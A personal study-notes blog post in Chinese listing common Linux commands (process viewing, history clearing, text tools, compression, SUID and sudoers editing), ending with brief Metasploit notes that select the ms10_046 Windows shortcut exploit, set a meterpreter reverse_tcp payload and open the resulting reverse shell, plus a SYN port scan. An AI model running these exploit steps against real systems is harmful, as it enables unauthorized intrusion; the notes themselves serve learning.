2014.10.5 再次学习LINUX

浏览数：17 / 时间：2015年06月20日

mesg 发送信息给root y    n
write/talk 写消息给
wall 给所有用户发送消息
ps -aux        ps -elF
pstree
命令行跳转：CTRL+a行首    CTRL+e行尾    CTRL+u清除光标左侧至开头    CTRL+k清除光标右侧至结尾    CTRL+左右键
history -c 清除所有命令        history -d 500 10 从第500个历史开始 删除10个命令记录
tr ‘a-z‘ ‘A-Z‘    替换命令
wc -l
grep --color    -i    -v显示没有被模式匹配到的行
sed(Stream EDitor) 流编辑器 - 行编辑器
awk
给文件添加特殊权限 suid: chmod u+s FILENAME    SGID
查看用户登录情况及日志： w whoami who last所有登录主机用户时间日志 lastb登录错误日志 lastlog所有用户登录日志总揽 mail查看邮件
命令gzip bzip2  xz 压缩文件，并且会删除原文件， 解压缩gunzip        zcat bzcat查看压缩文件 但是不解压    这几个命令是无法压缩文件夹的,只能压缩文件
zip 可以压缩文件夹， 并且得指定压缩后文件名xxx.zip 不删除源文件
tar -xzvf解压缩并展开归档  -czvf归档并压缩
visudo 专门用来编辑 /etc/sudoers    1）chmod u+w /etc/sudoers    2) vi /etc/sudoers    user1 ALL=(ALL) ALL    这就使得用户user1,可以使用sudo命令，执行超级权限了。    3) 最后撤销/etc/sudoer文件的权限    chmod u-w /etc/sudoers

kali下metaexploit使用:
msfconsole进入msf
armitage图形化界面

exploit模块：
    use exploit/windows/brower/ms10_046_shortcut_icon_dllloader    //使用哪个exploit
    show options    //查看需要配置的参数
    set SRVHOST 192.XXX
    set PAYLOAD windows/meterpreter/reverse_tcp    //配置exploit成功后 使用的payload
    show options
    set LHOST 192.XXX
    sessions -i 1        //如果攻击成功 进入攻击成功后获取的反弹的CMDSHELL

auxiliary模块：
    use auxiliary/scanner/portscan/syn